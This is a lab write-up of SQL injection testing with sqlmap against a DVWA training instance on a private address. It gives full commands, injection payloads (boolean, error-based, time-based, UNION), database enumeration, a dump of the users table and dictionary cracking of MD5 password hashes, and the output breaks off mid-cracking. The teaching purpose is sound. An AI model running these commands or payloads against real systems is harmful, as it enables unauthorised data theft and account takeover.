Web Penetration Testing in Practice: SQLMAP


I. Lab Title

Web penetration testing in practice: SQLMAP

II. Lab Objectives and Requirements

Understand how SQL injection vulnerabilities work.

Become familiar with using the SQLMAP tool.

1. Retrieve database information: the injection points found, the current database name, the DBMS version and so on. --current-db asks sqlmap for the name of the database the application is connected to. The --cookie value carries the logged-in PHPSESSID and the DVWA security level (low); DVWA redirects unauthenticated requests to its login page, so without that cookie sqlmap would be testing the login form rather than the vulnerable page.

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" --current-db
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:26:19 /2022-05-26/

[09:26:20] [INFO] testing connection to the target URL
[09:26:20] [INFO] checking if the target is protected by some kind of WAF/IPS
[09:26:20] [INFO] testing if the target URL content is stable
[09:26:20] [INFO] target URL content is stable
[09:26:20] [INFO] testing if GET parameter 'id' is dynamic
[09:26:20] [WARNING] GET parameter 'id' does not appear to be dynamic
[09:26:20] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[09:26:20] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[09:26:20] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:28] [WARNING] reflective value(s) found and filtering out
[09:26:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:28] [INFO] testing 'Generic inline queries'
[09:26:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:29] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:29] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable (with --not-string="Me")
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:29] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:30] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[09:26:30] [INFO] testing 'MySQL inline queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:26:30] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:26:30] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:26:40] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[09:26:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[09:26:40] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:26:40] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:26:40] [INFO] target URL appears to have 2 columns in query
[09:26:40] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[09:26:40] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[09:26:43] [INFO] testing if GET parameter 'Submit' is dynamic
[09:26:43] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[09:26:43] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[09:26:43] [INFO] testing for SQL injection on GET parameter 'Submit'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:26:43] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[09:26:43] [INFO] testing 'Generic inline queries'
[09:26:43] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[09:26:44] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[09:26:45] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[09:26:46] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[09:26:47] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[09:26:49] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[09:26:51] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[09:26:51] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[09:26:51] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[09:26:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[09:26:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[09:26:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[09:26:55] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[09:26:56] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[09:26:57] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[09:26:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:26:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:00] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[09:27:01] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[09:27:02] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[09:27:03] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[09:27:04] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[09:27:05] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[09:27:05] [INFO] testing 'MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)'
[09:27:05] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[09:27:05] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[09:27:05] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[09:27:05] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[09:27:05] [INFO] testing 'MySQL inline queries'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[09:27:05] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[09:27:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[09:27:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[09:27:08] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[09:27:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[09:27:10] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[09:27:11] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[09:27:12] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[09:27:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[09:27:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[09:27:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[09:27:16] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[09:27:17] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[09:27:17] [INFO] testing 'MySQL AND time-based blind (ELT)'
[09:27:18] [INFO] testing 'MySQL OR time-based blind (ELT)'
[09:27:19] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[09:27:19] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[09:27:20] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[09:27:20] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[09:27:20] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[09:27:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[09:27:32] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[09:27:39] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[09:27:44] [WARNING] GET parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 3725 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:27:44] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:27:44] [INFO] fetching current database
current database: 'dvwa'
[09:27:44] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:27:44] [WARNING] your sqlmap version is outdated

[*] ending @ 09:27:44 /2022-05-26/

2. Retrieve the table names of the database (-D dvwa --tables). The injection points are resumed from the session file saved by the first run, so none of the detection requests are repeated.

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -D "dvwa" --tables
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [)]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:32:48 /2022-05-26/

[09:32:48] [INFO] resuming back-end DBMS 'mysql'
[09:32:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:32:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:32:48] [INFO] fetching tables for database: 'dvwa'
[09:32:48] [WARNING] reflective value(s) found and filtering out
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+

[09:32:48] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:32:48] [WARNING] your sqlmap version is outdated

[*] ending @ 09:32:48 /2022-05-26/

3. Retrieve the columns of a given table (-T users --columns). -D is omitted here, so, as the warning in the output notes, sqlmap falls back to the current database, dvwa.

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" --columns
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:34:06 /2022-05-26/

[09:34:07] [INFO] resuming back-end DBMS 'mysql'
[09:34:07] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:34:07] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
[09:34:07] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[09:34:07] [INFO] fetching current database
[09:34:07] [INFO] fetching columns for table 'users' in database 'dvwa'
[09:34:07] [WARNING] reflective value(s) found and filtering out
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| password     | varchar(32) |
| user_id      | int(6)      |
+--------------+-------------+

[09:34:07] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:34:07] [WARNING] your sqlmap version is outdated

[*] ending @ 09:34:07 /2022-05-26/

4. Retrieve usernames and passwords (give -C the column names separated by commas). sqlmap recognises the 32-character hex values in the password column as MD5 hashes and offers to crack them with its bundled wordlist; every prompt below was answered with y.

python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump

E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338>python sqlmap.py -u "http://192.168.232.149/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=mrlv10gd9hqetfav424n3ijj51" -T "users" -C "user,password" --dump
E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\sqlmap.py:21: DeprecationWarning: The distutils package is deprecated and slated for removal in Python 3.12. Use setuptools or check PEP 632 for potential alternatives
  import distutils
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.5.6.2#dev}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:38:43 /2022-05-26/

[09:38:43] [INFO] resuming back-end DBMS 'mysql'
[09:38:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: id=1' OR NOT 1427=1427#&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1' AND (SELECT 8864 FROM(SELECT COUNT(*),CONCAT(0x717a6a7671,(SELECT (ELT(8864=8864,1))),0x71787a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- OXhb&Submit=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1' AND (SELECT 5848 FROM (SELECT(SLEEP(5)))ydqX)-- iPyQ&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT CONCAT(0x717a6a7671,0x586b797a44794f5550596575724a4e444d4377616c446b5a7465737a524e68664a6464534d625251,0x71787a7071),NULL#&Submit=Submit
---
[09:38:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.4.45
back-end DBMS: MySQL >= 5.0
[09:38:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[09:38:43] [INFO] fetching current database
[09:38:43] [INFO] fetching entries of column(s) '`user`,password' for table 'users' in database 'dvwa'
[09:38:43] [WARNING] reflective value(s) found and filtering out
[09:38:43] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[09:38:46] [INFO] writing hashes to a temporary file 'C:\Users\98377\AppData\Local\Temp\sqlmap01aoz2p_29596\sqlmaphashes-7_sfrh7s.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[09:38:53] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'E:\QQFileRecv\sqlmapproject-sqlmap-1.5.6-2-g7c7c338\sqlmapproject-sqlmap-7c7c338\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:39:05] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[09:39:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:39:08] [INFO] starting 16 processes
[09:39:12] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:39:14] [INFO] cracked password 'charley' for hash '8d3533d75ae2c3966d7e0d4fcc69216b'
[09:39:17] [INFO] current status: odrik... /
[09:39:17] [INFO] cracked password 'letmein' for hash '0d107d09f5bbe40cade3de5c71e9e9b7'
[09:39:18] [INFO] cracked password 'password' for hash '5f4dcc3b5aa765d61d8327deb882cf99'
[09:39:18] [INFO] current status: rootp... |
[09:39:20] [INFO] using suffix '1'
[09:39:30] [INFO] using suffix '123'
[09:39:34] [INFO] current status: arym1... /
[09:39:34] [INFO] cracked password 'abc123' for hash 'e99a18c428cb38d5f260853678922e03'
[09:39:40] [INFO] using suffix '2'
[09:39:50] [INFO] using suffix '12'
[09:40:00] [INFO] using suffix '3'
[09:40:10] [INFO] using suffix '13'
[09:40:20] [INFO] using suffix '7'
[09:40:31] [INFO] using suffix '11'
[09:40:41] [INFO] using suffix '5'
[09:40:51] [INFO] using suffix '22'
[09:41:02] [INFO] using suffix '23'
[09:41:12] [INFO] using suffix '01'
[09:41:22] [INFO] using suffix '4'
[09:41:32] [INFO] using suffix '07'
[09:41:42] [INFO] using suffix '21'
[09:41:52] [INFO] using suffix '14'
[09:42:03] [INFO] using suffix '10'
[09:42:12] [INFO] using suffix '06'
[09:42:22] [INFO] using suffix '08'
[09:42:32] [INFO] using suffix '8'
[09:42:43] [INFO] using suffix '15'
[09:42:53] [INFO] using suffix '69'
